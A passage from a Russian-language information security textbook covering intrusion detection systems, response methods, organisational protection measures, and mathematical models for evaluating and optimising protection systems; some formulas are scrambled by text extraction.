при обнаружении атак в реальном масштабе времени. Таким образом,
нарушитель не может удалить следы своего присутствия.
Анализируемые данные включают не только информацию о методе
атаки, но и информацию, которая может помочь при идентификации
292
злоумышленника и доказательстве в суде. Поскольку многие нарушите-
ли хорошо знакомы с журналами регистрации, они знают, как манипу-
лировать этими файлами для скрытия следов своей деятельности, сни-
жая эффективность систем уровня ОС, которым требуется эта информа-
ция для того, чтобы обнаружить атаку.
Система сетевого уровня, установленная с наружной стороны меж-
сетевого экрана (МЭ), может обнаруживать атаки, нацеленные на ресур-
сы за МЭ, даже несмотря на то, что МЭ, возможно, отразит эти попытки.
Системы уровня ОС не видят отраженных атак, которые не достигают
узлов за межсетевым экраном. Эта потерянная информация может быть
наиболее важной при оценке и совершенствовании политики безопасно-
сти.
Однако системы обнаружения сетевых атак также имеют и свои не-
достатки.
Во-первых, такие системы трудно применимы в высокоскоростных
сетях. Все современные коммерческие системы, несмотря на то, что
анонсируют возможность работы с сетями Fast Ethernet (100 Мбит/сек),
не могут в сетях с пропускной способностью выше 60-80 Мбит/сек. Т.е.
уже в сетях со скоростью свыше 100 Мбит/сек (например, ATM) такие
системы не применимы.
Во-вторых, сетевые системы обнаружения атак неэффективно рабо-
тают в коммутируемых сетях и сетях с канальным шифрованием.
Использование профилей "нормального" поведения
Профили нормального поведения используются для наблюдения за
пользователями, системной деятельностью или сетевым трафиком. Дан-
ные наблюдения сравниваются с ожидаемыми значениями профиля
нормального поведения, который строится в период обучения системы
обнаружения атак.
При настройке и эксплуатации систем, использующих профили,
приходится сталкиваться со следующими проблемами :
построение профиля пользователя (трудно формализуемая и трудо-
емкая задача, требующая от администратора большой предварительной
работы);
определение граничных значений характеристик поведения.
Неправильная настройка профиля нормального поведения может
привести к одному из двух случаев:
поведение субъекта вычислительной системы определяется как
аномальное, хотя на самом деле, оно таковым не является. Например,
одновременная посылка большого числа запросов об активности стан-
293
ций от администратора системы сетевого управления. Многие системы
обнаружения атак идентифицируют этот пример, как атаку типа "отказ в
обслуживании" ("denial of service");
пропуск атаки, которая не подпадает под определение аномального
поведения. Этот случай гораздо опаснее, чем ложное отнесение ано-
мального поведения к классу атак.
Метод профиля нормального поведения редко используется в со-
временных системах защиты информации (хотя такие попытки и дела-
ются). Использование профилей нашло свое практическое применение в
системах обнаружения мошенничества (fraud detection systems), исполь-
зуемых в финансовых структурах или у операторов связи.
Использование сигнатур атак
Данный метод очень часто сопоставляют с анализом "на лету". Ме-
тод заключается в описании атаки в виде сигнатуры (signature) и поиска
данной сигнатуры в контролируемом пространстве (сетевом трафике,
журнале регистрации и т.д.).
В качестве сигнатуры атаки может выступать шаблон действий или
строка символов, характеризующие аномальную деятельность. Эти сиг-
натуры хранятся в базе данных, аналогичной той, которая используется
в антивирусных системах.
Собственно говоря, антивирусные резидентные мониторы являются
частным случаем системы обнаружения атак, но т.к. эти направления
изначально развивались параллельно, то принято разделять их.
Несмотря на эффективность и простоту реализации этих методов, в
системах, их реализующих, проблемы также существуют.
Первая проблема заключается в создании механизма описания сиг-
натур, т.е. языка описания атак.
А вторая проблема, плавно вытекающая из первой, как записать
атаку, чтобы зафиксировать все ее возможные модификации?
Необходимо отметить, что первая проблема уже частично решена в
некоторых продуктах. Например, система описания сетевых атак
Advanced Packets Exchange, реализованная компанией Internet Security
Systems, Inc. и предлагаемая совместно с разработанной ею и широко
известной в России, сертифицированной в Гостехкомиссии, системой
анализа защищенности Internet Scanner.
294
5.7.2. Состав системы обнаружения атак
Все системы обнаружения атак могут быть построены на основе

двух архитектур: "автономный агент" и "агент-менеджер". В первом
случае на каждый защищаемый узел или сегмент сети устанавливаются
агенты системы, которые не могут обмениваться информацией между
собой, а также не могут управляться централизовано с единой консоли.
Этих недостатков лишена архитектура "агент-менеджер".
Проанализировав большинство существующих решений можно
привести список компонент, из которых должна состоять типичная си-
стема обнаружения атак (см. рис. 55).
Графический интерфейс
Подсистема управления компонентами
Подсистема обнаружения атак

Состав
системы
Подсистема реагирования
обнаружения
атак
Модуль слежения
База знаний
Хранилище данных
Рис. 55. Состав системы обнаружения атак
Графический интерфейс
Не надо говорить, что даже очень мощное и эффективное средство
не будет использоваться, если у него отсутствует дружелюбный интер-
фейс. В зависимости от операционной системы, под управлением кото-
рой функционирует система обнаружения атак, графический интерфейс
должен соответствовать стандартам де-факто для Windows и Unix.
Подсистема управления компонентами
Данная подсистема позволяет управлять различными компонентами
системы обнаружения атак. Управление может осуществляться, как при
помощи внутренних протоколов и интерфейсов, так и при помощи уже
295
разработанных стандартов, например, SNMP. Под термином "управле-
ние" понимается как возможность изменения политики безопасности
для различных компонентов системы обнаружения атак (например, мо-
дулей слежения), так и получение информации от этих компонент
(например, сведения о зарегистрированной атаке).
Подсистема обнаружения атак
Основной компонент системы обнаружения атак, который осу-
ществляет анализ информации, получаемой от модуля слежения. По ре-
зультатам анализа данная подсистема может идентифицировать атаки,
принимать решения относительно вариантов реагирования, сохранять
сведения об атаке в хранилище данных и т.д.
Подсистема реагирования
Подсистема, осуществляющая реагирование на обнаруженные ата-
ки и иные контролируемые события. Более подробно варианты реагиро-
вания будут описаны ниже.
Модуль слежения
Компонент, обеспечивающий сбор данных из контролируемого
пространства (журнала регистрации или сетевого трафика). У разных
производителей называется также сенсором (sensor), монитором
(monitor), зондом (probe) и т.д. В зависимости от архитектуры построе-
ния системы обнаружения атак может быть физически отделен (архи-
тектура "агент-менеджер") от других компонентов, т.е. находиться на
другом компьютере.
База знаний
В зависимости от методов, используемых в системе обнаружения
атак, база знаний может содержать профили пользователей и вычисли-
тельной системы, сигнатуры атак или подозрительные строки, характе-
ризующие несанкционированную деятельность. Эта база может попол-
няться производителем системы обнаружения атак, пользователем си-
стемы или третьей стороной, например, аутсорсинговой компанией,
осуществляющей поддержку этой системы.
Хранилище данных
Обеспечивает хранение данных, собранных в процессе функциони-
рования системы обнаружения атак.
296
Методы реагирования на атаку
Недостаточно обнаружить атаку. Надо еще и своевременно среаги-
ровать на нее. Причем реакция на атаку - это не только ее блокирование.
Часто бывает необходимо "пропустить" атакующего в сеть компании,
для того чтобы зафиксировать все его действия и в дальнейшем исполь-
зовать их в процессе разбирательства. Поэтому в существующих систе-
мах применяется широкий спектр методов реагирования, которые можно
условно разделить на 3 категории: уведомление, хранение и активное
реагирование (см. рис. 56). Применение той или иной реакции зависит
от многих факторов.
Методы реагирования на атаку
Активное
Уведомление Сохранение
реагирование
Управление
администратора воспроизведение средствами защиты
Управлением сетевым
оборудованием
системы регистрация
Завершение сессии
с атакующим узлом
Блокировка работы
атакующего
Рис. 56. Методы реагирования на атаку
Уведомление
Самым простым и широко распространенным методом уведомле-
ния является посылка администратору безопасности сообщений об атаке
на консоль системы обнаружения атак. Поскольку такая консоль не мо-
жет быть установлена у каждого сотрудника, отвечающего в организа-
ции за безопасность, а также в тех случаях, когда этих сотрудников мо-
гут интересовать не все события безопасности, необходимо применение
иных механизмов уведомления. Таким механизмом является посылка
сообщений по электронной почте, на пейджер, по факсу или по телефо-
ну. Последние два варианта присутствуют только в системе обнаруже-
297
ния атак RealSecure американской компании Internet Security Systems,
Inc.
К категории "уведомление" относится также посылка управляющих
последовательностей к другим системам. Например, к системам сетевого
управления (HP OpenView, Tivoli TME10, CA Unicenter и т.д.) или к
межсетевым экранам (CheckPoint Firewall-1, Lucent Managed Firewall,
Raptor Firewall и т.д.). В первом случае используется стандартизованный
протокол SNMP, а во втором - внутренние или стандартизованные
(например, SAMP) протоколы.
Сохранение
К категории "сохранение" относятся два варианта реагирования:
регистрация события в базе данных и
воспроизведение атаки в реальном масштабе времени.
Первый вариант широко распространен и в других системах защи-
ты и на нем не стоит долго останавливаться.
Второй вариант более интересен. Он позволяет администратору
безопасности воспроизводить в реальном масштабе времени (или с за-
данной скоростью) все действия, осуществляемые атакующим. Это поз-
воляет не только проанализировать "успешные" атаки и предотвратить
их в дальнейшем, но и использовать собранные данные для разбира-
тельств.
Активное реагирование
К этой категории относятся следующие варианты реагирования:
блокировка работы атакующего, завершение сессии с атакующим узлом,
управлением сетевым оборудованием и средствами защиты. Эта катего-
рия механизмов реагирования, с одной стороны, достаточно эффективна,
а с другой, использовать их надо очень аккуратно, т.к. неправильная их
эксплуатация может привести к нарушению работоспособности всей
вычислительной системы.
298
6. СИСТЕМНЫЕ ВОПРОСЫ ОБЕСПЕЧЕНИЯ
ИНФОРМАЦИОННОЙ БЕЗОПАСНОСТИ
Система (подсистема) обеспечения информационной безопасности, в
автоматизированных системах различного уровня и назначения, должна
предусматривать комплекс организационных, программных, техниче-
ских и, при необходимости, криптографических средств и мер по защите
информации при ее автоматизированной обработке и хранении, при ее
передаче по каналам связи.
Основными направлениями обеспечения информационной безопас-
ности являются:
 обеспечение защиты информации от хищения, утраты, утечки,
уничтожения, искажения и подделки за счет НСД и специальных
воздействий;
 обеспечение защиты информации от утечки по техническим кана-
лам при ее обработке, хранении и передаче по каналам связи.
В качестве основных мер обеспечения информационной безопасно-
сти рекомендуются следующие:
 документальное оформление перечня сведений конфиденциально-
го характера с учетом ведомственной и отраслевой специфики
этих сведений;
 реализация разрешительной системы допуска исполнителей (поль-
зователей, обслуживающего персонала) к информации и связан-
ным с ее использованием работам, документам;
 ограничение доступа персонала и посторонних лиц в защищаемые
помещения и помещения, где размещены средства информатиза-
ции и коммуникации, а также хранятся носители информации;
 разграничение доступа пользователей и обслуживающего персо-
нала к информационным ресурсам, программным средствам обра-
ботки (передачи) и защиты информации;
 регистрация действий пользователей АС и обслуживающего пер-
сонала, контроль за несанкционированным доступом и действиями
пользователей, обслуживающего персонала и посторонних лиц;
 учет и надежное хранение бумажных и машинных носителей ин-
формации, ключей (ключевой документации) и их обращение, ис-
ключающее их хищение, подмену и уничтожение;
299
 использование средств защиты, создаваемых на основе физико–
химических технологий для контроля доступа к объектам защиты
и для защиты документов от подделки;
 необходимое резервирование технических средств и дублирование
массивов и носителей информации;
 использование сертифицированных серийно выпускаемых в за-
щищенном исполнении технических средств обработки, передачи
и хранения информации;
 использование технических средств, удовлетворяющих требова-
ниям стандартов по электромагнитной совместимости;
 использование сертифицированных средств защиты информации;
 размещение объектов защиты на максимально возможном рассто-
янии относительно границы контролируемой зоны;
 размещение понижающих трансформаторных подстанций элек-
тропитания и контуров заземления объектов защиты в пределах
контролируемой зоны;
 развязка цепей электропитания объектов защиты с помощью за-
щитных фильтров, блокирующих (подавляющих) информативный
сигнал;
 электромагнитная развязка между линиями связи и другими цепя-
ми вторичных технических средств и систем (ВТСС), выходящими
за пределы КЗ, и информационными цепями, по которым цирку-
лирует защищаемая информация;
 использование защищенных каналов связи (защищенных волокон-
но– оптических линий связи (ВОЛС) и криптографических средств
защиты информации;
 размещение дисплеев и других средств отображения информации,
исключающее несанкционированный просмотр информации;
 организация физической защиты помещений и собственно техни-
ческих средств с помощью сил охраны и технических средств,
предотвращающих или существенно затрудняющих проникнове-
ние в здания, помещения посторонних лиц, хищение документов и
информационных носителей, самих средств информатизации, ис-
ключающих нахождение внутри контролируемой зоны техниче-
ских средств разведки или промышленного шпионажа;
 криптографическое преобразование информации, обрабатываемой
и передаваемой средствами вычислительной техники и связи (при
необходимости, определяемой особенностями функционирования
конкретных АС и систем связи);
300
 предотвращение внедрения в автоматизированные системы про-
грамм–вирусов, программных закладок.
В свою очередь эти меры должны применятся комплексно в виде
системы защиты информации (СЗИ).
Оценки параметров СЗИ в условиях высокой степени неопределен-
ности условий ее функционирования должны вычисляться с использова-
нием не одной математической модели, а согласованного семейства мо-
делей, адаптивно конструирующихся одна из другой и, таким образом,
непрерывно совершенствующихся на основе оптимального выбора ис-
ходных данных.
При синтезе систем защиты исходными должны явиться следую-
щие два положения:
 выбор математически продуктивного критерия оптимальности в
соответствии с архитектурой системы защиты и технологией об-
работки информации на объекте;
 четкая математическая формулировка задачи, учитывающая все
априорные сведения и позволяющая решить ее в соответствии с
принятым критерием.
Итогом решения задачи синтеза системы защиты и его конеч-
ной целью должны быть четыре содержательных результата:
 архитектура системы защиты;
 количественная оценка качества ее функционирования;
 оценка практической чувствительности разработанных моделей к
отклонениям от априорных данных;
 физическая реализуемость синтезируемых систем защиты в со-
временных системах обмена данными (соответствие технологии
обработки информации уровню ее защиты).
Под эффективностью систем защиты информации будем пони-
мать эффективность ее использования в качестве активного средства в
операции обеспечения конфиденциальности обработки, хранения и пе-
редачи информации.
При этом, оценка эффективности операции заключается в выра-
ботке оценочного суждения относительно пригодности заданного спо-
соба действий специалистов по защите информации или приспособлен-
ности средств защиты к решению задач.
Введение показателя эффективности требует также определения
критерия эффективности как правила, позволяющего сопоставлять
стратегии, характеризующемся различной степенью достижения цели, и
осуществлять выбор стратегий из множества допустимых.
301
Теоретические основы построения оптимальных систем защиты
исключительно сложны и, несмотря на интенсивность исследований в
этой предметной области, еще далеки от совершенства.
Кроме того отсутствие достаточно общей теории, формирующей
методологические основания изучения явлений с неопределенными фак-
торами, делает неприменимыми байесовские методы классической тео-
рии статистических решений для синтеза оптимальных систем защиты.
Под методологией оптимизации систем защиты информации бу-
дем понимать разработку теории, связывающей их структуру, логиче-
скую организацию, методы и средства деятельности с целью формиро-
вания функции выбора и выделения подмножества наилучших страте-
гий.
Оптимальным будет считаться решение, которое в предполагае-
мых условиях наилучшим образом удовлетворит условиям рассматрива-
емой задачи. Оптимальность решения достигается за счет наиболее ра-
ционального распределения ресурсов, затрачиваемых на решение про-
блемы защиты.
В процессе создания оптимальной СЗИ неизбежно возникает зада-
ча коррекции требований к системе защиты. Трудность ее решения за-
ключается в том, что возникают неопределенности не стохастического
характера, определяемые:
 наличием целенаправленного противодействия со стороны проти-
воборствующей системы, способы действий которой неизвестны
исследователю;
 недостаточной изученностью некоторых явлений, сопровождав-
ших процесс функционирования систем защиты;
 нечетким представлением цели операции, приводящей к неодно-
значной трактовке соответствия реального результата операции
требуемому.
Трудность исследования вопросов обеспечения безопасности ин-
формационных технологий усугубляется большой неопределенностью
условий функционирования АС.
Поэтому постановка задачи обеспечения защиты информации, как
правило, оказывается некорректной, поскольку зачастую формулируется
в условиях непредсказуемости поведения системы в нестандартных и,
особенно, экстремальных ситуациях. Влияние неопределенности осо-
бенно сильно проявляется в трансформируемых, нестабильных, слабо
организованных АС из-за неполноты, несвоевременности, не нормиро-
ванности и низкой достоверности информации.
302
В связи с этим задачи обеспечения безопасности информационных
технологий , как правило, не обладают свойством единственности реше-
ния, эффективность и оптимальность которого определяются степенью
учета ограничений, характерных для конкретной ситуации. Для повы-
шения степени корректности постановки задач обеспечения информаци-
онной безопасности необходимо повышать знания о АС в непрерывно
изменяющихся условиях ее функционирования.
В связи с этим получение и использование знаний должны осу-
ществляться непосредственно в процессе функционирования системы
путем постепенного накопления необходимой информации, анализа и
использования ее для эффективного выполнения системой заданной це-
левой функции в изменяющихся условиях внутренней и внешней среды.
Известные математические модели, используемые для описания
структуры, поведения и управления СЗИ, особенно нестабильными, в
условиях некорректной постановки задач не дают желаемого результата.
Поэтому необходима разработка новых, ориентированных на спе-
цифику процессов защиты информации методов и средств моделирова-
ния.
Для получения информации о поведении СЗИ требуется выделить
группы параметров и определить времена проверки их значений. При
этом рассматриваются особо значимые и важные с точки зрения реали-
зации цели функционирования системы параметры.
Проверка и анализ значений указанных параметров, необходимы
для повышения знаний о системе, должны осуществляться таким обра-
зом, чтобы обеспечить возможность принятия своевременных и досто-
верных решений и корректировку поведения системы в процессе функ-
ционирования. Таким образом, в СЗИ обязательно должно быть преду-
смотрено выполнение процедур контроля ее работоспособности и диа-
гностирования состояний.
Принятие решений может в большинстве случаев базируется на
экспертных оценках. Однако в условиях неопределенности исходных
данных и некорректности постановки задач управления эти оценки мо-
гут внести дополнительную некорректность в принимаемое решение,
увеличив тем самым исходную неопределенность
Решение проблем моделирования СЗИ требует поэтапного выпол-
нения следующих исследований.
1. Разработка принципов, методов и средств сокращения раз-
мерности описания СЗИ.
303
В результате разработки должны быть сформулированы требова-
ния и рекомендации по рациональной организации структуры СЗИ, де-
композированной по уровням контроля и управления. Это позволит про-
водить дальнейшие исследования в условиях минимизированной раз-
мерности описания системы.
2. Разработка методологии, методов и средств решения задач
обеспечения информационной безопасности в условиях не-
определенности.
Результатом исследований должна явиться разработка методоло-
гических основ, методов и средств решения некорректно поставленных
задач в условиях неопределенности.
Конечным результатом исследований должна быть модель СЗИ.
6.1. Основные виды моделей обеспечения информацион-

ной безопасности
Системную классификацию общих моделей в настоящее время
произвести практически невозможно, так как ввиду малого числа таких
моделей для этого нет достаточных данных [27]. Поэтому классифика-
цию рассматриваемых моделей представим простым перечнем и краткой
характеристикой лишь некоторых моделей.
Общая модель процесса защиты информации.
Данная модель в самом общем виде и для самого общего объекта
защиты должна отображать процесс защиты информации как процесс
взаимодействия дестабилизирующих факторов, воздействующих на ин-
формацию, и средств защиты информации, препятствующих действию
этих факторов. Итогом взаимодействия будет тот или иной уровень за-
щищенности информации;
Обобщенная модель системы защиты информации.
Являясь дальнейшим развитием общей модели процесса защиты,
обобщенная модель системы защиты должна отображать основные про-
цессы, осуществляемые в ней с целью рационализации процессов защи-
ты. Указанные процессы в самом общем виде могут быть представлены
как процессы распределения и использования ресурсов, выделяемых на
защиту информации;
304
Модель общей оценки угроз информации.
Основной направленностью этой модели является оценка не про-
сто угроз информации как таковых, а еще и оценка тех потерь, которые
могут иметь место при проявлении различных угроз. Модели данного
направления важны еще и тем, Что именно на них в наибольшей степени
были выявлены те условия, при которых такие оценки могут быть адек-
ватны реальным процессам защиты информации;
Модели анализа систем разграничения доступа к ресурсам АС.
Модели этого класса предназначены для обеспечения решения за-
дач анализа и синтеза систем (механизмов) разграничения доступа к
различным видам ресурсов АС и прежде всего к массивам данных или
полям ЗУ. Выделение этих моделей в самостоятельный класс общих мо-
делей обусловлено тем, что механизмы разграничения доступа относят-
ся к числу наиболее существенных компонентов систем защиты инфор-
мации, от эффективности функционирования которых, в значительной
мере зависит общая эффективность защиты информации в АС.
6.2. Общая характеристика математических методов

оценки и обоснования требований к СЗИ
Системы защиты информации, с одной стороны, являются состав-
ной частью информационной системы, с другой стороны сами по себе
представляют сложную техническую систему. Решение задач анализа и
синтеза СЗИ усложняется рядом их особенностей, основными из кото-
рых являются:
 сложная опосредствованная взаимосвязь показателей качества
СЗИ с показателями качества информационной системы;
 необходимость учета большого числа показателей (требований)
СЗИ при оценке и выборе их рационального варианта;
 преимущественно качественный характер показателей (требова-
ний), учитываемых при анализе и синтезе СЗИ;
 существенная взаимосвязь и взаимозависимость этих показателей
(требований), имеющих противоречивый характер;
 трудность получения исходных данных, необходимых для реше-
ния задач анализа и синтеза СЗИ, в особенности на ранних этапах
их проектирования.
Указанные особенности делают практически невозможным при-
менение традиционных математических методов, в том числе методов
математической статистики и теории вероятностей, а также классиче-
305
ских методов оптимизации для решения прикладных задач анализа и
синтеза СЗИ.
Сложность процесса принятия решений, отсутствие математиче-
ского аппарата приводят к тому, что при оценке и выборе альтернатив
возможно, (а зачастую просто необходимо) использовать и обрабатывать
качественную экспертную информацию. Перспективным направлением
разработки методов принятия решений при экспертной исходной ин-
формации является лингвистический подход на базе теории нечетких
множеств и лингвистической переменной.
6.3. Анализ методов решения задачи выборки рацио-

нального варианта СЗИ
Принципиальными особенностями решения задачи выбора рацио-
нального варианта СЗИ, определяющими метод ее решения являются:
 многокритериальность задачи выбора;
 не только количественное, но и качественное (нечеткое) описание
показателей качества СЗИ, задаваемых в виде требований;
 при нечеткой постановке задачи влияние на выбор метода ее ре-
шения экспертной информации, определяющей предпочтение того
или иного показателя.
Рассмотрим указанные особенности решения задачи более по-
дробно.
Общая постановка задачи многокритериальной оптимизации мо-
жет иметь следующий вид [14].
Пусть X  х1 ,...., хi ,...., xn - вектор оптимизируемых параметров неко-
торой системы S. Некоторое j-е свойство системы S характеризуется ве-
личиной j-го показателя q ( X ); j  1, m . Тогда система в целом характери-
i
зуется вектором показателей Q  q1 ,...., qi ,...., qm . Задача многокритериаль-

ной оптимизации сводится к тому, чтобы из множества M s вариантов си-
стемы S выбрать такой вариант (систему S0), который обладает наилуч-
шим значением вектора Q. При этом предполагается. Что понятие
“наилучший вектор Q” предварительно сформулировано математически,
т.е. выбран (обоснован) соответствующий критерий предпочтения (от-
ношение предпочтения).
Анализ литературы [4; 11; 20] показывает, что все многочислен-
ные методы решения многокритериальных задач можно свести к трем
группам методов:
 метод главного показателя;
306
 метод результирующего показателя;
 лексикографические методы (методы последовательных уступок).
Кратко рассмотрим суть этих методов решения многокритериаль-
ных задач.
Метод главного показателя основан на переводе всех показате-
лей качества, кроме какого-либо однородного, называемого главным, в
разряд ограничений типа равенств и неравенств. Присвоим главному по-
казателю номер q1(S). Тогда задача сводится к однокритериальной зада-
че выбора системы S Ms, обладающей минимальным значением пока-
зателя q1(S) при наличии ограничений типа равенств и неравенств, т.е.
имеет вид
min q1 ( S ) (6)
SM S
при ограничениях
q j ( S )  q jo ; j  2,...l
qk ( S )  qko ; k  l  1,... p; (7)
qr ( S )  qro ; r  p  1,..., m;
Методу главного показателя присущи следующие недостатки:

1. В большинстве случаев нет достаточных оснований для то-
го, чтобы считать какой-то один и притом вполне определенный показа-
тель качества является главным, а все остальные – второстепенными.
2. Для показателей качества q2(S), ..., qm(S), переводимых в раз-
ряд ограничений, достаточно трудно установить их допустимые значе-
ния.
Метод результирующего показателя качества основан форми-
ровании обобщенного показателя путем интуитивных оценок влияния
частных показателей качества q1, ..., qm на результирующее качество вы-
полнения системой ее функций. Оценки такого влияния даются группой
специалистов – экспертов, имеющих опыт разработки подобных систем.
Наибольшее применение среди результирующих показателей ка-
чества получили аддитивный, мультипликативный и минимаксный по-
казатели.
Аддитивный показатель качества представляет собой сумму
взвешенных нормированных частных показателей и имеет вид
m
Q   j q j , (8)
j 1
307
где qi- нормированное значение j-го показателя;
j – весовой коэффициент j-го показателя, имеющий тем боль-
шую величину, чем больше он влияет на качество системы;
m

j 1
j  1;  j  0; j  1, m . (9)
Главным недостатком аддитивного показателя является то, что при

его применении может происходить взаимная компенсация частных по-
казателей. Это значит, что уменьшение одного из показателей вплоть до
нулевого значения может быть компенсировано возрастанием другого
показателя. Для ослабления этого недостатка вводятся специальные
ограничения на минимальные значения частных показателей, на их веса
и другие приемы.
Мультипликативный показатель качества образуется путем пе-
ремножения частных показателей с учетом их весовых коэффициентов и
имеет вид
m j
Q  Ï qj , (10)
j 1
где qi и j имеет тот же смысл, что и в аддитивном показателе.

Наиболее существенное отличие мультипликативного показателя
от аддитивного заключается в том, что аддитивный показатель базиру-
ется на принципе справедливой абсолютной уступки по отдельным по-
казателям, а мультипликативный – на принципе справедливой относи-
тельной уступки. Суть последнего заключается в том что справедливым
считается такой компромисс, когда суммарный уровень относительного
снижения одного или нескольких показателей не превышает суммарного
уровня относительного увеличения остальных показателей.
Максиминный показатель. В ряде случаев вид результирующей
целевой функции достаточно трудно обосновать или применить. В по-
добных случаях возможным простым путем решения задачи является
применение максиминного показателя. Правило выбора оптимальной
системы S0 в этом случае имеет следующий вид
S M K j  m

max min qi ( S ),...q j ( S ),...q m ( S ), (11)
если весовые коэффициенты частных показателей отсутствуют;
308
 1
max min q1 (S ),...q j
S M K j  m
j
( S ),...qm
m
( S ) , (12)
если весовые коэффициенты определены.

Максиминный показатель обеспечивает наилучшее (наибольшее)
значение наихудшего (наименьшего) из частных показателей качества.
6.4. Оценка эффективности обеспечения информацион-

ной безопасности в АС
6.4.1. Модель элементарной защиты
В общем случае модель защиты предмета может быть в виде, пред-

ставленном на рис. 57. В качестве предмета защиты выступает один из
компонентов АС.
Преграда
Предмет защиты
Рис. 57. Модель элементарной защиты

Предмет защиты помещен в замкнутую однородную защитную
оболочку, называемую преградой. Прочность защиты зависит от свойств
преграды. Принципиальную роль играет способность преграды противо-
стоять попыткам преодоления ее нарушителем. Свойство предмета за-
щиты – способность привлечения его владельца и потенциального
нарушителя. Привлекательность предмета защиты заключается в его
цене. Это свойство предмета защиты используется при оценке защи-
щенности информации в вычислительных системах. При этом считается,
что прочность созданной преграды достаточна, если стоимость ожидае-
мых затрат на ее преодоление потенциальным нарушителем превышает
стоимость защищаемой информации. Однако оценка того и другого ока-
залась непростой задачей, и до настоящего времени не существует ка-
кой–либо универсальной методики ее проведения на практике для кон-
кретных вычислительных систем. Поэтому рассмотрим другой подход.
309
Если обозначить вероятность непреодоления преграды нарушите-
лем через Рсзи, вероятность преодоления преграды нарушителем через
Рнр, то согласно теории вероятности [20] сумма вероятностей двух про-
тивоположных событий равна 1, т.е. Рсзи + Рнр= 1. Отсюда Рсзи =(1–Рнр).
В реальном случае у преграды могут быть пути ее обхода [4]. Обо-
значим вероятность обхода преграды нарушителем через Робх. Наруши-
тель, действующий один, выберет один из путей: преодоление преграды
или обходной вариант. Тогда, учитывая несовместимость событий, фор-
мальное выражение для прочности преграды можно представить в виде
Pсзи  min 1  Pнр , 1  Pобх . (13)
Выбор прямого или обходного пути будет зависеть от трудностей,

которые ожидают нарушителя на каждом из них. В целях подстраховки
мы выбираем наиболее опасный случай, когда нарушитель знает и выбе-
рет наиболее легкий путь, т.е. путь с наибольшей вероятностью преодо-
ления его трудностей. Это обстоятельство позволяет предположить, что
прочность преграды определяется вероятностью ее преодоления или об-
хода потенциальным нарушителем по пути с наибольшим значением
этой вероятности. Другими словами, в случае единственного нарушите-
ля прочность защиты определяется ее слабейшим звеном.
Логично предположить, что у преграды может быть несколько пу-
тей обхода. Тогда последнее выражение примет вид
Pсзи  min 1  Pнр , 1  Pобх1 , 1  Pобх2 , 1  Pобх3 ...1  Pобхk , (14)
где k– количество путей отхода.

Для случая, когда нарушителей более одного, и они действуют од-
новременно (организованная группа) по каждому пути, это выражение с
учетом совместимости событий будет выглядеть как
Pсзи  1  Pнр 1  Pобх1 1  Pобх2 1  Pобх3 ...1  Pобхk  . (15)
В этом случае прочность преграды будет определяться произведе-

нием результатов вычитания из единицы значений вероятностей доступа
нарушителей к предмету защиты по каждому возможному пути преодо-
ления этой преграды.
Расчетные соотношения для контролируемой преграды
Когда к предмету защиты, имеющему постоянную ценность, необ-
ходимо и технически возможно обеспечить контроль доступа, обычно
310
применяется постоянно действующая преграда, обладающая свойствами
обнаружения и блокировки доступа нарушителя к предмету или объекту
защиты. В качестве такой защиты могут быть применены: человек, спе-
циальная или встроенная в АС автоматизированная система контроля
под управлением человека.
Принцип работы автоматизированной преграды основан на том, что
в ней блоком управления производится периодический контроль датчи-
ков обнаружения нарушителя. Результаты контроля наблюдаются чело-
веком на средствах централизованного управления. Периодичность
опроса датчиков автоматом может достигать тысячных долей секунды и
менее. В этом случае ожидаемое время преодоления преграды наруши-
телем значительно превышает период опроса датчиков. Поэтому такой
контроль часто считают постоянным. Но для обнаружения нарушителя
человеком, управляющим автоматом контроля, только малого периода
опроса датчиков недостаточно.
Необходимо еще и время на выработку и передачу сигнала тревож-
ной сигнализации на блок отображения средств управления, т.е. время
срабатывания автомата, так как оно часто значительно превышает пери-
од опроса датчиков и тем самым увеличивает время обнаружения нару-
шителя. Практика показывает, что обычно сигнала тревожной сигнали-
зации достаточно для приостановки действий нарушителя, если этот
сигнал до него дошел. Но поскольку физический доступ к объекту защи-
ты пока еще открыт, дальнейшие действия охраны сводятся к определе-
нию места и организации блокировки доступа нарушителя, на что также
потребуется время.
Для анализа ситуации рассмотрим временную диаграмму процесса
контроля и обнаружения НСД, приведенную на рис. 58.
где Т– период опроса датчиков;
Тоб– время передачи сигнала и обнаружения НСД;
tбл– время блокировки доступа.
Из рис. 57. следует, что нарушитель может быть не обнаружен в
двух случаях:
а) когда tнр<Т;
б) когда Т<tнр<Тобл .
311
t
T T T
tНР
Tоб tбл
Tобл
Рис. 58 . Временная диаграмма процесса конт роля НСД

В случае а) требуется дополнительное условие – попадание интер-
вала времени tнр в интервал Т, т.е. необходима синхронизация действий
нарушителя с частотой опроса датчиков обнаружения. Для решения этой
задачи нарушителю придется скрытно подключить измерительную ап-
паратуру в момент выполнения несанкционированного доступа к ин-
формации, что является довольно сложной задачей для постороннего
человека. Поэтому считаем, что свои действия с частотой опроса датчи-
ков он синхронизировать не сможет и может рассчитывать лишь на не-
которую вероятность успеха, выражающуюся в вероятности попадания
отрезка времени tнр в промежуток времени между им пульсами опроса
датчиков, равный Т.
При tнр> Т действия нарушителя наверняка будут зафиксированы
датчиком системы контроля.
Формально эту задачу можно представить следующим образом.
Есть бесконечно последовательное множество событий в виде кон-
трольных импульсов с расстоянием Т между ними и есть определенное
множество элементарных событий в виде отрезка длиной tнр в тех же
единицах времени, который случайным образом накладывается на пер-
вое множество. Задача состоит в определении вероятности попадания
отрезка tнр на контрольный импульс, если tнр < Т.
Нетрудно заметить, что с увеличением отрезка tнр вероятность этого
со бытия увеличивается, при уменьшении – уменьшается, т.е. имеется
312
прямая зависимость. При увеличении Т вероятность попадания отрезка
на контрольный импульс уменьшается, при уменьшении Т – увеличива-
ется, т.е. имейся обратная зависимость. Если обозначить вероятность
попадания отрезка на контрольный импульс через Рф (фиксации события
в контрольной точке), мы вправе считать, что
t пр
Pф  . (16)
Т
Следует также отметить, что эта формула справедлива также и для

организационной меры защиты в виде периодического контроля задан-
ного объекта человеком. При этом полагаем, что обнаружение, опреде-
ление места НСД и его блокировка происходят в одно время – в момент
контроля объекта человеком, Т о6л= Т, где Т – период контроля челове-
ком объекта защиты.
При tнр> Т нарушитель будет зафиксирован наверняка, т.е. Рф = 1.
Вероятность успеха нарушителя (попадания tнр в промежуток меж-
ду контрольными импульсами) как противоположного события по тео-
рии вероятностей будет определяться по формуле
t нр
Рнр  1  . (17)
Т
В случае б), когда Т <tнр< Т обл, событие НСД фиксируется наверня-

ка, и вероятность обнаружения действий нарушителя будет определять-
ся соотношением tнр, а времени обнаружения и блокировки НСД – Т обл.
